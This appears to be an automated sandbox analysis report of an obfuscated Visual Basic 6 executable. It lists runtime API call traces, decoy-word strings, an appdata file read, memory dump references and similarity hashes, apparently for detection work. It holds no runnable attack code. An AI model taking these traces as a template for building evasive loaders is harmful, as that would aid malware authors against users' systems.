__vbaI4Var.MSVBVM60(?,?,?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D029
__vbaFreeVarList.MSVBVM60(00000006,0000000A,00000004,0000000A,00000004,?,?), ref: 0041D09A
#581.MSVBVM60(eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D0A7
#713.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D0B7
__vbaStrMove.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D0C4
__vbaFpI4.MSVBVM60 ref: 0041D0E2
__vbaStrCopy.MSVBVM60 ref: 0041D0F8
__vbaStrMove.MSVBVM60(Benefact6,?), ref: 0041D115
__vbaStrMove.MSVBVM60 ref: 0041D156
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D172
#696.MSVBVM60(ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D17F
#574.MSVBVM60(00000003), ref: 0041D1A6
__vbaStrMove.MSVBVM60(00000003), ref: 0041D1B3
__vbaR8IntI4.MSVBVM60(00000003), ref: 0041D1BE
__vbaLenBstrB.MSVBVM60(Whiskysourens1,?,?,?), ref: 0041D1FB
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000708), ref: 0041D238
__vbaFreeStr.MSVBVM60(00000000,00401260,00402330,00000708), ref: 0041D252
__vbaFreeVar.MSVBVM60(00000000,00401260,00402330,00000708), ref: 0041D25D
#696.MSVBVM60(Kainsmrkernes3), ref: 0041D267
__vbaStrCopy.MSVBVM60 ref: 0041D2E6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,0000070C), ref: 0041D344
__vbaFreeStr.MSVBVM60(00000000,00401260,00402330,0000070C), ref: 0041D35E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000710), ref: 0041D3BF
__vbaVarDup.MSVBVM60(00000000,00401260,00402330,00000710), ref: 0041D3F3
#607.MSVBVM60(?,00000065,00000003), ref: 0041D408
__vbaStrVarMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D414
__vbaStrMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D421
__vbaStrCopy.MSVBVM60(?,?,00000065,00000003), ref: 0041D431
__vbaLenBstrB.MSVBVM60(Udstillingslokalet,?,?,000FFFC6,005EA767,?,?,00000065,00000003), ref: 0041D467
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D4A7
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000), ref: 0041D4BF
#705.MSVBVM60(00000002,00000000), ref: 0041D4E4
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041D4F1
__vbaLenBstrB.MSVBVM60(00000000,00000002,00000000), ref: 0041D4F7
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000714), ref: 0041D532
__vbaFreeStr.MSVBVM60(00000000,00401260,00402330,00000714), ref: 0041D54C
__vbaFreeVar.MSVBVM60(00000000,00401260,00402330,00000714), ref: 0041D557
__vbaLenBstr.MSVBVM60(Generalisations7), ref: 0041D561
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000718), ref: 0041D5B4
#525.MSVBVM60(00000067), ref: 0041D5D3
__vbaStrMove.MSVBVM60(00000067), ref: 0041D5E0
#618.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D5EC
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D5F9
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D61D
__vbaStrCopy.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D640
__vbaStrMove.MSVBVM60(?,SOLITRSKAKKEN,Indvi2,Fdres,?,STRUTTENDE,00000017,00000067), ref: 0041D66E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,0000071C), ref: 0041D6AB
__vbaStrMove.MSVBVM60(00000000,00401260,00402330,0000071C), ref: 0041D6DB
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0041D705
#564.MSVBVM60(00000005,?), ref: 0041D73D
__vbaHresultCheck.MSVBVM60(00000000), ref: 0041D757
#541.MSVBVM60(?,16:16:16), ref: 0041D777
__vbaStrVarVal.MSVBVM60(?,?,?,16:16:16), ref: 0041D78A
#519.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041D790
__vbaStrMove.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041D79D
#648.MSVBVM60(0000000A,00000000,?,?,?,16:16:16), ref: 0041D7BD
__vbaStrMove.MSVBVM60(?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041D809
__vbaI4Var.MSVBVM60(?,00000000,?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041D816
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,00000720), ref: 0041D84C
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D882
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041D8A8
#696.MSVBVM60(00402910), ref: 0041D8B5
#696.MSVBVM60(00402958,00402910), ref: 0041D8C6
__vbaStrCopy.MSVBVM60(00402958,00402910), ref: 0041D8DD
__vbaFreeStr.MSVBVM60 ref: 0041D923
__vbaVarMove.MSVBVM60 ref: 0041D94A
__vbaVarMove.MSVBVM60 ref: 0041D96C
__vbaVarIdiv.MSVBVM60(?,?,?), ref: 0041D980
__vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 0041D986
__vbaFreeVar.MSVBVM60(0041DA78), ref: 0041DA20
__vbaFreeStr.MSVBVM60(0041DA78), ref: 0041DA28
__vbaAryDestruct.MSVBVM60(00000000,?,0041DA78), ref: 0041DA3F
__vbaFreeStr.MSVBVM60(00000000,?,0041DA78), ref: 0041DA47
__vbaFreeStr.MSVBVM60(00000000,?,0041DA78), ref: 0041DA4F
__vbaFreeStr.MSVBVM60(00000000,?,0041DA78), ref: 0041DA57
__vbaFreeStr.MSVBVM60(00000000,?,0041DA78), ref: 0041DA5F
__vbaFreeVar.MSVBVM60(00000000,?,0041DA78), ref: 0041DA67
__vbaFreeStr.MSVBVM60(00000000,?,0041DA78), ref: 0041DA72

Strings

eudaemonistical, xrefs: 0041D0A2
16:16:16, xrefs: 0041D76B
ADMIRINGLY, xrefs: 0041D17A
RODTEGNENES, xrefs: 0041D0B2
tril, xrefs: 0041D02F
Paucify9, xrefs: 0041D0ED
CANNIBALEAN, xrefs: 0041C574
Indvi2, xrefs: 0041D651
centralregeringens, xrefs: 0041D2DB
Benefact6, xrefs: 0041D104
ASCRY, xrefs: 0041D426
Udstillingslokalet, xrefs: 0041D462
DUMBFISH, xrefs: 0041D635
Hjortens, xrefs: 0041C441
replicr, xrefs: 0041C68F
Generalisations7, xrefs: 0041D55C
Odontoma7, xrefs: 0041D30F
Readjust, xrefs: 0041C528
Admiraliteternes1, xrefs: 0041CACE
SELVFINANSIEREDES, xrefs: 0041D904
tilskrersaksene, xrefs: 0041CA0D
Dagvagten, xrefs: 0041C8F8
Forretningsbrevet5, xrefs: 0041CB57
OFFENTLIGHEDSSFRE, xrefs: 0041C8B4
Skovteknikeren6, xrefs: 0041D8D2
Bursati, xrefs: 0041C579
blaarv, xrefs: 0041CE30
multivalent, xrefs: 0041C57E
=9, xrefs: 0041D2C9
SOLITRSKAKKEN, xrefs: 0041D656
Kainsmrkernes3, xrefs: 0041D262
Vidnefast, xrefs: 0041CB8F
Snoreskrternes8, xrefs: 0041D03B
undrede, xrefs: 0041D30A
Utrecht8, xrefs: 0041D38A
STRUTTENDE, xrefs: 0041D5E7
Whiskysourens1, xrefs: 0041D1F6
Fdres, xrefs: 0041D64C
7:7:7, xrefs: 0041C4F6
Lersernes, xrefs: 0041CECB

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$List$#648#696$Copy$Bstr$#519#564$#541#574#705#713$#522#524#525#527#535#537#558#560#581#606#607#610#618#661#670#685#690#714ChkstkConstruct2DestructIdivNew2
String ID: 16:16:16$7:7:7$=9$ADMIRINGLY$ASCRY$Admiraliteternes1$Benefact6$Bursati$CANNIBALEAN$DUMBFISH$Dagvagten$Fdres$Forretningsbrevet5$Generalisations7$Hjortens$Indvi2$Kainsmrkernes3$Lersernes$OFFENTLIGHEDSSFRE$Odontoma7$Paucify9$RODTEGNENES$Readjust$SELVFINANSIEREDES$SOLITRSKAKKEN$STRUTTENDE$Skovteknikeren6$Snoreskrternes8$Udstillingslokalet$Utrecht8$Vidnefast$Whiskysourens1$blaarv$centralregeringens$eudaemonistical$multivalent$replicr$tilskrersaksene$tril$undrede
API String ID: 1918163132-2023598156
Opcode ID: 79fd0e6a76fd8874aad7265cd8f159aa84f9d5d29769f7b8792a19fea7840374
Instruction ID: a944ac6c03559dab59bd703b7b575cc70f45ea410f8e3fe7685cc86448e7d518
Opcode Fuzzy Hash: 79fd0e6a76fd8874aad7265cd8f159aa84f9d5d29769f7b8792a19fea7840374
Instruction Fuzzy Hash: CAD20875940228ABDB21EF61CD85FDDB7B8AF08304F1080EAE509BB1A1DB785B85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCD0, Relevance: 124.7, APIs: 62, Strings: 9, Instructions: 416COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FCEE
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FD18
__vbaAryConstruct2.MSVBVM60(?,004025B0,00000002,?,?,?,?,00401546), ref: 0041FD28
#593.MSVBVM60(0000000A), ref: 0041FD46
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041FD51
#537.MSVBVM60(000000D4,0000000A), ref: 0041FD5B
__vbaStrMove.MSVBVM60(000000D4,0000000A), ref: 0041FD65
#648.MSVBVM60(0000000A), ref: 0041FD7C
#652.MSVBVM60(?,00000002,?,?,?,0000000A), ref: 0041FDA0
#692.MSVBVM60(?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FDB3
#522.MSVBVM60(?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FDC0
__vbaStrVarVal.MSVBVM60(?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FDD2
#514.MSVBVM60(00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FDD8
__vbaVarTstNe.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 0041FDF8
__vbaFreeStr.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 0041FE07
__vbaFreeVarList.MSVBVM60(00000006,?,0000000A,00000002,?,?,00008008,00008008,?,00000000,?,?,00000052,?,?,?), ref: 0041FE2F
__vbaVarDup.MSVBVM60 ref: 0041FE63
#513.MSVBVM60(?,?,000000A2), ref: 0041FE75
__vbaStrVarVal.MSVBVM60(?,?,00000075,00000002,?,?,000000A2), ref: 0041FE96
#628.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FE9C
__vbaStrMove.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FEA6
__vbaFreeStr.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FEAE
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000002,00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FEC1
__vbaNew2.MSVBVM60(0040258C,004223C0,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 0041FEDC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014), ref: 0041FF3E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,000000C0), ref: 0041FF9D
__vbaFreeObj.MSVBVM60(00000000,?,0040259C,000000C0), ref: 0041FFBF
#628.MSVBVM60(UNINTERMITTEDLY,00000008,00000002), ref: 0041FFDD
#670.MSVBVM60(?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FFF0
__vbaVarTstNe.MSVBVM60(?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FFFD
__vbaFreeVarList.MSVBVM60(00000003,00000002,00008008,?,?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 00420017
#525.MSVBVM60(000000B1,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 00420033
__vbaStrMove.MSVBVM60(000000B1,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 0042003D
#696.MSVBVM60(00000000,000000B1,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 00420043
__vbaFreeStr.MSVBVM60(00000000,000000B1,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 00420051
#696.MSVBVM60(MINESTRYGNING,00000000,000000B1,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 0042005B
#541.MSVBVM60(?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 00420070
__vbaStrVarVal.MSVBVM60(?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025B0,00000002), ref: 0042007D
#696.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025B0,00000002), ref: 00420083
__vbaFreeStr.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025B0,00000002), ref: 00420097
__vbaFreeVar.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,004025B0,00000002), ref: 0042009F
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004200FA
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420104
#696.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042010A
__vbaFreeStr.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042011F
__vbaFreeVar.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420127
#696.MSVBVM60(Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042017C
#648.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004201BE
__vbaFreeVar.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004201D3
#648.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420208
__vbaFreeVar.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042021D
#651.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420248
__vbaStrMove.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420252
__vbaStrCat.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420258
__vbaStrMove.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420262
__vbaFreeStr.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042026A
__vbaFreeVar.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420272
__vbaFreeStr.MSVBVM60(004202FA,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 004202C5
__vbaFreeStr.MSVBVM60(004202FA,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 004202CD
__vbaFreeStr.MSVBVM60(004202FA,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 004202D5
__vbaAryDestruct.MSVBVM60(00000000,?,004202FA,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 004202EC
__vbaFreeStr.MSVBVM60(00000000,?,004202FA,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 004202F4

Strings

MINESTRYGNING, xrefs: 00420056
PREHISTORICS, xrefs: 0041FE46
Jiggerens, xrefs: 0041FDAA
Suppositoriets, xrefs: 00420177
Rappees, xrefs: 0041FDA5
2:2:2, xrefs: 00420067
BESMUDSES, xrefs: 0042023F
:, xrefs: 0041FFC4
UNINTERMITTEDLY, xrefs: 0041FFD8

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#696$#648List$#628CheckHresult$#513#514#522#525#537#541#593#651#652#670#692#702ChkstkConstruct2CopyDestructNew2
String ID: 2:2:2$:$BESMUDSES$Jiggerens$MINESTRYGNING$PREHISTORICS$Rappees$Suppositoriets$UNINTERMITTEDLY
API String ID: 2160480785-2797486545
Opcode ID: 9a1b4819fd14fec164ebd8d3d08cd776f87e8bf1dda14c58956acf41bbfd0f09
Instruction ID: e05a448a9fe77b45811d47edf6050266dc9c57ed9225bdad43217c79e79079f4
Opcode Fuzzy Hash: 9a1b4819fd14fec164ebd8d3d08cd776f87e8bf1dda14c58956acf41bbfd0f09
Instruction Fuzzy Hash: C8026D71940218ABDB15EBA0CC96FEDB7B8BF05304F10856FE105BB1E2EB789A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA9C, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 184COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041DAB9
#692.MSVBVM60(?,baadene,Scopiformly9,?,?,?,?,00401546), ref: 0041DAD9
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041DAF4
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041DB03
#618.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041DB1E
__vbaStrMove.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041DB28
__vbaNew2.MSVBVM60(0040258C,004223C0,Reklamekampagne4,0000001B,00008008,?), ref: 0041DB40
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DBA2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,00000118,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DC01
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4,0000001B,00008008), ref: 0041DC23
__vbaStrCopy.MSVBVM60(00008008,?), ref: 0041DC30
#618.MSVBVM60(?,00000044,00008008,?), ref: 0041DC3A
__vbaStrMove.MSVBVM60(?,00000044,00008008,?), ref: 0041DC44
__vbaStrCmp.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DC4F
__vbaFreeStr.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DC66
__vbaVarDup.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DC8E
#666.MSVBVM60(?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DC9B
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DCBA
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DCC0
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DCCA
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DCD9
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DCE1
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000), ref: 0041DCF4
__vbaGet3.MSVBVM60(00000000,?,00000001), ref: 0041DD04
__vbaFileClose.MSVBVM60(00000001,00000000,?,00000001), ref: 0041DD0B
#526.MSVBVM60(?,000000EC,00000001,00000000,?,00000001), ref: 0041DD19
__vbaStrVarMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DD22
__vbaStrMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DD2C
__vbaFreeVar.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DD34
__vbaFreeStr.MSVBVM60(0041DD88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DD6A
__vbaFreeStr.MSVBVM60(0041DD88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DD72
__vbaFreeStr.MSVBVM60(0041DD88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DD7A
__vbaFreeStr.MSVBVM60(0041DD88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DD82

Strings

Jordfstedes4, xrefs: 0041DC4A
Reklamekampagne4, xrefs: 0041DB19
Scopiformly9, xrefs: 0041DACB
appdata, xrefs: 0041DC7A
Ambulancesagen2, xrefs: 0041DADE
CONTINUATOR, xrefs: 0041DC28
\XvFu5flZcgudIlwvVLtjOx372, xrefs: 0041DCA0
baadene, xrefs: 0041DAD0

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#618CheckFileHresult$#526#666#692ChkstkCloseCopyGet3ListNew2Open
String ID: Ambulancesagen2$CONTINUATOR$Jordfstedes4$Reklamekampagne4$Scopiformly9$\XvFu5flZcgudIlwvVLtjOx372$appdata$baadene
API String ID: 3805544571-2284846736
Opcode ID: 5fca4d9844be23f74f42e20ccd9dd83d0b353054252d5fa202b77e02b400e416
Instruction ID: cafa92f8c2581aca575d317039719a458be0c6de6e9bd63d9c3b4cb87a51cd39
Opcode Fuzzy Hash: 5fca4d9844be23f74f42e20ccd9dd83d0b353054252d5fa202b77e02b400e416
Instruction Fuzzy Hash: C7710B71D00218AADB14EBA1CD46FDEB7B8AF04704F50817AF109B71E2DB785A45CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00420484, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 307COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 004204A2
#575.MSVBVM60(?,00000003), ref: 004204F1
#518.MSVBVM60(?,?,?,00000003), ref: 004204FE
__vbaVarTstLt.MSVBVM60(00008008,?), ref: 00420522
__vbaFreeVarList.MSVBVM60(00000003,00000003,?,?,00008008,?), ref: 0042053C
__vbaNew2.MSVBVM60(0040258C,004223C0,?,?,?,00401546), ref: 0042056D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014), ref: 004205CF
__vbaChkstk.MSVBVM60(00000000,?,0040257C,00000014), ref: 00420600
__vbaStrI4.MSVBVM60(005E4C2E), ref: 00420616
__vbaStrMove.MSVBVM60(005E4C2E), ref: 00420620
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,0000013C), ref: 00420661
__vbaFreeStr.MSVBVM60(00000000,?,0040259C,0000013C), ref: 00420678
__vbaFreeObj.MSVBVM60(00000000,?,0040259C,0000013C), ref: 00420680
#573.MSVBVM60(?,00000002), ref: 004206A2
__vbaStrVarVal.MSVBVM60(?,?,000000A1,00000002,?,00000002), ref: 004206C6
#628.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004206CC
__vbaStrMove.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004206D6
__vbaFreeStr.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004206DE
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,00000002,00000000,?,?,000000A1,00000002,?,00000002), ref: 004206F1
__vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,00000009,00000000,?,?,?,00401546), ref: 00420713
#564.MSVBVM60(00000004,?), ref: 004207E7
__vbaHresultCheck.MSVBVM60(00000000), ref: 00420801
__vbaI4Var.MSVBVM60(?), ref: 00420819
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?), ref: 0042083A
__vbaOnError.MSVBVM60(000000FF), ref: 004208D0
__vbaStrI4.MSVBVM60(003ED0FD,000000FF), ref: 004208E1
__vbaStrMove.MSVBVM60(003ED0FD,000000FF), ref: 004208EB
#578.MSVBVM60(00000000,003ED0FD,000000FF), ref: 004208F1
__vbaFreeStr.MSVBVM60(00000000,003ED0FD,000000FF), ref: 004208FC
__vbaAryDestruct.MSVBVM60(00000000,?,00420948), ref: 0042093A
__vbaFreeStr.MSVBVM60(00000000,?,00420948), ref: 00420942

Strings

FOSTERET, xrefs: 00420503

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultListMove$Chkstk$#518#564#573#575#578#628DestructErrorNew2Redim
String ID: FOSTERET
API String ID: 53557705-1574993597
Opcode ID: 3b3e72e5f0afa7fdbdba26bf733167622dc5863ba2c83933160a41d4ae04be56
Instruction ID: ec8836b000943781542c44480d32d978310ad4f9213c9eeab0408e46e022b369
Opcode Fuzzy Hash: 3b3e72e5f0afa7fdbdba26bf733167622dc5863ba2c83933160a41d4ae04be56
Instruction Fuzzy Hash: E9D1F8B5900218EFDB10EFA4D985FCDBBB4BF08314F10819AE505BB292DB799A44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041E86D, Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041E888
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041E8A0
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E8B0
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E8B9
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E8C3
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E8CB
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E8EC
__vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 0041E908
__vbaVarTstNe.MSVBVM60(?,00000000), ref: 0041E915
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0041E921
#697.MSVBVM60(000009AE,?,00000000), ref: 0041E933
__vbaStrMove.MSVBVM60(000009AE,?,00000000), ref: 0041E93D
__vbaStrCat.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041E94C
__vbaStrMove.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041E956
__vbaFreeStr.MSVBVM60(0041E996,?,00000000), ref: 0041E978
__vbaFreeObj.MSVBVM60(0041E996,?,00000000), ref: 0041E980
__vbaFreeStr.MSVBVM60(0041E996,?,00000000), ref: 0041E988
__vbaFreeStr.MSVBVM60(0041E996,?,00000000), ref: 0041E990

Strings

Scripting.FileSystemObject, xrefs: 0041E8A7
Propreste7, xrefs: 0041E942
Desorganisationens, xrefs: 0041E947
FolderExists, xrefs: 0041E8FC
Gulsoterne, xrefs: 0041E8D0

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
